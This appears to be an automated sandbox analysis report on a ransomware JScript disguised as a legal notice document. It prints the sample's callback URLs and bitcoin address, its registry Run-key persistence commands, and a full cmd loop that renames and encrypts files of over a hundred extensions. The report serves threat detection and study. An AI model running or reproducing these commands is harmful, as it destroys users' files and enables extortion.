Analysis
-
max time kernel
150s -
max time network
133s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
15-01-2021 15:50
Static task
static1
Behavioral task
behavioral1
Sample
Notice_to_Appear_00614075.doc.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Notice_to_Appear_00614075.doc.js
Resource
win10v20201028
General
-
Target
Notice_to_Appear_00614075.doc.js
-
Size
37KB
-
MD5
f84c5242741ccd7949762ca5cbb96556
-
SHA1
894c726e0a3e8cf3fd98690c27f885c4aa775775
-
SHA256
aa5b2a6a2711cde023d91112c0574f121b4edd6c8b62409155e75d36f38b0bb6
-
SHA512
5f5716fdf73bd38f28e36cf2d8dc5a8b8ec613a3665e43e5103206fb1bc9f32ad8a44c40cea9cf037f609ad33579569b86c8fd2002832d1daf63218e27feab71
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\a.txt
16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
http://sswboiler.com/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
http://bucataria-sylviei.ro/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
http://lifan-m.ru/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
http://www.czarnieckiliny.pl/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
http://demo3.twt.it/counter/?a=16UGRaKSk1LN9AeyLCS8qRLRb2nZwyNaHB
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 14 4712 wscript.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt" reg.exe -
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\"" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command reg.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
wscript.execmd.execmd.execmd.exedescription pid process target process PID 4712 wrote to memory of 3828 4712 wscript.exe cmd.exe PID 4712 wrote to memory of 3828 4712 wscript.exe cmd.exe PID 4712 wrote to memory of 4020 4712 wscript.exe cmd.exe PID 4712 wrote to memory of 4020 4712 wscript.exe cmd.exe PID 4712 wrote to memory of 3944 4712 wscript.exe cmd.exe PID 4712 wrote to memory of 3944 4712 wscript.exe cmd.exe PID 4712 wrote to memory of 4300 4712 wscript.exe cmd.exe PID 4712 wrote to memory of 4300 4712 wscript.exe cmd.exe PID 4712 wrote to memory of 4060 4712 wscript.exe cmd.exe PID 4712 wrote to memory of 4060 4712 wscript.exe cmd.exe PID 3828 wrote to memory of 3104 3828 cmd.exe reg.exe PID 3828 wrote to memory of 3104 3828 cmd.exe reg.exe PID 4712 wrote to memory of 3052 4712 wscript.exe cmd.exe PID 4712 wrote to memory of 3052 4712 wscript.exe cmd.exe PID 3944 wrote to memory of 4512 3944 cmd.exe reg.exe PID 3944 wrote to memory of 4512 3944 cmd.exe reg.exe PID 4020 wrote to memory of 4484 4020 cmd.exe reg.exe PID 4020 wrote to memory of 4484 4020 cmd.exe reg.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Notice_to_Appear_00614075.doc.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"3⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" eshcq5kixoxv136vc35cel0lp2it1p3zz4r4)2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\a.txtMD5
31ff92435ec51fab9b7ba2ed4c15dd3e
SHA1696a564dde590c05ad07c16357304fe1c9b25710
SHA256b5aec39215b6000a55dca8f51e96338deb950d5d29796eae1683acb6740cb143
SHA5127066800f4473fe6937ea28e8885aded0db866a5c2c9eb1a8bb4473ea4b069cb54bd87b48f060b32cdaac884f42c0e32360999386426ba0e8752c53dbf8da39f6
-
C:\Users\Admin\AppData\Local\Temp\a0.exeMD5
aa95b86d3ba312056034964adc1e19b2
SHA14b17b2c278462245e95cafdef16fff76401ba105
SHA256773f80fcae6ac4fe16fb497a23e5596dfcec643ff14967c76366d3b333f3d7b9
SHA512a992837759a461396ba8796ba63229e05b288e115961adec6a0730ee67d5500e923c6f9b6e5835193e09f2f15185185a28c1afd28c48ae6fa326d5bf405104e8
-
memory/3052-9-0x0000000000000000-mapping.dmp
-
memory/3104-8-0x0000000000000000-mapping.dmp
-
memory/3828-3-0x0000000000000000-mapping.dmp
-
memory/3944-5-0x0000000000000000-mapping.dmp
-
memory/4020-4-0x0000000000000000-mapping.dmp
-
memory/4060-7-0x0000000000000000-mapping.dmp
-
memory/4300-6-0x0000000000000000-mapping.dmp
-
memory/4484-12-0x0000000000000000-mapping.dmp
-
memory/4512-10-0x0000000000000000-mapping.dmp
-
memory/4712-2-0x000001A3A89B0000-0x000001A3A89B4000-memory.dmpFilesize
16KB